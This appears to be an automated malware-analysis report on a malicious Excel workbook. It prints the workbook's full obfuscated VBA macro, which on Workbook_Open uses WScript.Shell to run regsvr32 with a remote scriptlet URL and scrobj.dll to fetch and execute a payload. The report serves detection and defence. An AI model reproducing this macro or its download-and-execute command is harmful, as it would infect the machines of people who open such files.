Verdict: MALICIOUS
Risk Score: 410
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The file is an Excel document containing a Workbook_Open VBA macro, which runs automatically when the workbook is opened. The macro creates a WScript.Shell object via CreateObject and uses it to launch regsvr32 with a remote scriptlet URL (the /i: argument) and scrobj.dll, a common technique for downloading and executing a secondary payload; the randomised identifiers and the spreadsheet-formatting code around the call are obfuscation. ClamAV further confirms the verdict, detecting the file as Xls.Malware.Valyria-10036093-0.
Heuristics (9)

- ClamAV: Xls.Malware.Valyria-10036093-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Valyria-10036093-0
- VBA project inside OOXML (medium, OOXML_VBA, 6 related findings): document contains a VBA project; VBA macros present
- Shell() call in VBA (critical, OLE_VBA_SHELL). Matched line in script:

  ```vb
  .Filters.Add "Excel Files", "*.HpDnSidGJFQTFksRAoTAReskzutALnNIzyXLDAHRdbOkeZhhcVhbKtEDSrUFPIU; *.OaJhELSMQXCdkNMPRsdFEUYwEdwneJWuoDWHhnOusQkOJvWXS; *.Ay; *.cZTBGfIaSNVwRwwLEXUSZp; *.GCiMDJFkYbtXAePJIXEhRVdANOwzUDJebD", 1
  Set uF = CreateObject("WScript.Shell")
  uF.Run ("regsvr32 /sizPKWwyBNY /nYEMdzPaGVA /uizPKWwyBNY /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74 scrobj.dll OJKCVrHLdX")
  ```

- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script:

  ```vb
  .Filters.Add "Excel Files", "*.HpDnSidGJFQTFksRAoTAReskzutALnNIzyXLDAHRdbOkeZhhcVhbKtEDSrUFPIU; *.OaJhELSMQXCdkNMPRsdFEUYwEdwneJWuoDWHhnOusQkOJvWXS; *.Ay; *.cZTBGfIaSNVwRwwLEXUSZp; *.GCiMDJFkYbtXAePJIXEhRVdANOwzUDJebD", 1
  Set uF = CreateObject("WScript.Shell")
  uF.Run ("regsvr32 /sizPKWwyBNY /nYEMdzPaGVA /uizPKWwyBNY /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74 scrobj.dll OJKCVrHLdX")
  ```

- LOLBin reference in VBA (critical, OLE_VBA_LOLBIN). Matched line in script:

  ```vb
  Set uF = CreateObject("WScript.Shell")
  uF.Run ("regsvr32 /sizPKWwyBNY /nYEMdzPaGVA /uizPKWwyBNY /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74 scrobj.dll OJKCVrHLdX")
  .Show
  ```

- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:

  ```vb
  .Filters.Add "Excel Files", "*.HpDnSidGJFQTFksRAoTAReskzutALnNIzyXLDAHRdbOkeZhhcVhbKtEDSrUFPIU; *.OaJhELSMQXCdkNMPRsdFEUYwEdwneJWuoDWHhnOusQkOJvWXS; *.Ay; *.cZTBGfIaSNVwRwwLEXUSZp; *.GCiMDJFkYbtXAePJIXEhRVdANOwzUDJebD", 1
  Set uF = CreateObject("WScript.Shell")
  uF.Run ("regsvr32 /sizPKWwyBNY /nYEMdzPaGVA /uizPKWwyBNY /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74 scrobj.dll OJKCVrHLdX")
  ```

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script:

  ```vb
  Attribute VB_Customizable = True
  Private Sub Workbook_Open()
  For hUSDAzUT = 1 To VPBNwVXyVvGQGOQcsISEJ
  ```

- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74 (in document text: OOXML body / shared strings)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7405 bytes | b9a4175106d655cfa590bdebd41b4d0b77420a1eee42633061754497127f1b71 |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 23040 bytes | 9e460985741bde15d353ecc8a15478781279a08e5ea950d30c92442a16f63ac5 |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
For hUSDAzUT = 1 To VPBNwVXyVvGQGOQcsISEJ
MnLN = NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("YOE" & hUSDAzUT).Value
otEWuReUviZfOEzSezSsatNtuESSNcYtyoAzifaUbVkneAJNQFpvPeFPDh = NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & hUSDAzUT).Value
Select Case True
Case MnLN = "DbuodtLzHV:": NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("YOE" & hUSDAzUT & ":WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & hUSDAzUT).Font.Bold = True
Case InStr(1, MnLN, "yDaHdpcNPkzCRctGuonStzTDzLDJGJhWsTrarMYWwfKICKbnpRcLoDzYJDiyMyihb: ")
NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("YOE" & hUSDAzUT & ":tVOrLfDkzoSYASDpXNOCQLCPTGpRACENGOoPKAeSpIdTDRAXurQPbwoLyYBf" & hUSDAzUT).Interior.ColorIndex = 15
NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("YOE" & hUSDAzUT).Font.Bold = True
Case InStr(1, otEWuReUviZfOEzSezSsatNtuESSNcYtyoAzifaUbVkneAJNQFpvPeFPDh, "YOE"): NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & hUSDAzUT & ":WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & (hUSDAzUT + 2)).Interior.ColorIndex = 37
Case InStr(1, otEWuReUviZfOEzSezSsatNtuESSNcYtyoAzifaUbVkneAJNQFpvPeFPDh, "WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt"): NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & hUSDAzUT & ":WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & (hUSDAzUT + 2)).Interior.ColorIndex = 3
Case InStr(1, otEWuReUviZfOEzSezSsatNtuESSNcYtyoAzifaUbVkneAJNQFpvPeFPDh, "LLIDLaVZEYQrcYoFiQPHeCJrTSILw"): NYLIONeUWBDitYUeUAQMIZIAhefDPiSCtuzQZZLkTtWfKUnsdneWYGcIpwsKsHfhDbIG.UOFeQwKcNhBOU(1).Range("WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & hUSDAzUT & ":WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt" & (hUSDAzUT + 2)).Interior.Color = RGB(50, 205, 50)
End Select
Next hUSDAzUT
Application.DisplayAlerts = False
With Application.FileDialog(msoFileDialogFilePicker)
.AllowMultiSelect = False
'YLCFURrakMzPWfbpdPrOnPekpbkPDdJKIRiNdXGFktMftpRWRKYpSn yuHtIIN hUSDAzUT UOFeQwKcNhBOU
.Filters.Add "Excel Files", "*.HpDnSidGJFQTFksRAoTAReskzutALnNIzyXLDAHRdbOkeZhhcVhbKtEDSrUFPIU; *.OaJhELSMQXCdkNMPRsdFEUYwEdwneJWuoDWHhnOusQkOJvWXS; *.Ay; *.cZTBGfIaSNVwRwwLEXUSZp; *.GCiMDJFkYbtXAePJIXEhRVdANOwzUDJebD", 1
Set uF = CreateObject("WScript.Shell")
uF.Run ("regsvr32 /sizPKWwyBNY /nYEMdzPaGVA /uizPKWwyBNY /i:https://www.4sync.com/web/directDownload/xKeFw8Si/pxjLRT8v.fd85e82b25af2e7c1e397a6b2d3f5a74 scrobj.dll OJKCVrHLdX")
.Show
'yDaHdpcNPkzCRctGuonStzTDzLDJGJhWsTrarMYWwfKICKbnpRcLoDzYJDiyMyihb YOE YOE /nYEMdzPaGVA yuHtIIN YOE YOE YOE yuHtIIN
End With
If InStr(fullpath, ".Ay") = 0 Then
Exit Sub
End If
Set ws = Workbooks.Open(fullpath)
Set wb = Workbooks.Add
ws.UOFeQwKcNhBOU(1).UsedRange.Copy Destination:=wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("YOE" & Rows.eU).End(xlUp)
wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("oCKQSQv").Value = "Status"
lRow = wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Cells(Rows.eU, 1).End(xlUp).Row
For ZeJJOyduFvCzeYcvcGuuhkeUhQsMS = 2 To lRow
If wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("H" & ZeJJOyduFvCzeYcvcGuuhkeUhQsMS).Value = 0 And wb.UOFeQwKcNhBOU(1).Range("I" & ZeJJOyduFvCzeYcvcGuuhkeUhQsMS).Value = 0 Then
wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("ZeJJOyduFvCzeYcvcGuuhkeUhQsMS" & ZeJJOyduFvCzeYcvcGuuhkeUhQsMS).Value = "LLIDLaVZEYQrcYoFiQPHeCJrTSILw"
Else
wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("ZeJJOyduFvCzeYcvcGuuhkeUhQsMS" & ZeJJOyduFvCzeYcvcGuuhkeUhQsMS).Value = "LLIDLaVZEYQrcYoFiQPHeCJrTSILw"
End If
Next ZeJJOyduFvCzeYcvcGuuhkeUhQsMS
wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("DLrQhkFbWKXynPDfhPMC:oCKQSQv").AutoFilter _
Field:=4, _
Criteria1:=Array("EN", "EN/GVLWVkzR", "FF", "FF/GVLWVkzR", "TGhvSRwNWCCRuAFzEdOIEnJwbGZYOhQCEonMuTyQYkyQkLJSfEAvuNoEXVpu", "TGhvSRwNWCCRuAFzEdOIEnJwbGZYOhQCEonMuTyQYkyQkLJSfEAvuNoEXVpu/GVLWVkzR"), _
Operator:=xlFilterValues
'UfALhzLQZUIbZrWR?HfzPGbLnLJYIdnEiZFOTnGICDefITOWnVIAMzbAbPDFQNk
wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("DLrQhkFbWKXynPDfhPMC:oCKQSQv").AutoFilter _
Field:=5, _
Criteria1:=Array("1", "2", "3", "4", "5", "6", "7"), _
Operator:=xlFilterValues
'yDaHdpcNPkzCRctGuonStzTDzLDJGJhWsTrarMYWwfKICKbnpRcLoDzYJDiyMyihb
wb.UOFeQwKcNhBOU("NPTiWfOvhEcdLe").Range("DLrQhkFbWKXynPDfhPMC:oCKQSQv").AutoFilter _
Field:=7, _
Criteria1:=Array("YOE", "WCXDCWQiMWOaMTskMNQnizODhQBtOPEZRMyhVENOYt", "LLIDLaVZEYQrcYoFiQPHeCJrTSILw"), _
Operator:=xlFilterValues
Worksheets("NPTiWfOvhEcdLe").Cells(1, 1).Select
UOFeQwKcNhBOU.Add
wb.PivotCaches.Create(SourceType:=xlDatabase, SourceData:= _
"NPTiWfOvhEcdLe!R1C1:R" & lRow & "yuHtIIN", Version:=xlPivotTableVersion15).CreatePivotTable _
TableDestination:="GactrRkVfNLZowCuehotEMBaMMbGoFGLBBtcrSUKWBKAXLe!R3C1", TableName:="PivotTable1", DefaultVersion _
:=xlPivotTableVersion15
UOFeQwKcNhBOU("GactrRkVfNLZowCuehotEMBaMMbGoFGLBBtcrSUKWBKAXLe").Select
wb.UOFeQwKcNhBOU("GactrRkVfNLZowCuehotEMBaMMbGoFGLBBtcrSUKWBKAXLe").PivotTables(1).AddFields _
ColumnFields:="YOE", _
RowFields:=Array("yDaHdpcNPkzCRctGuonStzTDzLDJGJhWsTrarMYWwfKICKbnpRcLoDzYJDiyMyihb", "RUOVNWvJXbUGzzzCrpHu", "RUOVNWvJXbUGzzzCrpHu", "RUOVNWvJXbUGzzzCrpHu", "RUOVNWvJXbUGzzzCrpHu")
With wb.UOFeQwKcNhBOU("GactrRkVfNLZowCuehotEMBaMMbGoFGLBBtcrSUKWBKAXLe").PivotTables(1).PivotFields("iQFsAFVrXT")
.Orientation = xlDataField
.Name = "eU"
.Function = xlCount
End With
With wb.UOFeQwKcNhBOU("GactrRkVfNLZowCuehotEMBaMMbGoFGLBBtcrSUKWBKAXLe").PivotTables(1).PivotFields("iQFsAFVrXT")
.Orientation = xlDataField
.Name = "BZXBboGXXpriCOyiXVEiwQnOBFZLSXupwPdJcVGG"
.NumberFormat = "BZXBboGXXpriCOyiXVEiwQnOBFZLSXupwPdJcVGG"
.Function = xlCount
.Calculation = xlPercentOfRow
End With
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```

Detection for vbaProject_00.bin:
- ClamAV: Xls.Malware.Valyria-10036093-0
- Obfuscation or payload: unlikely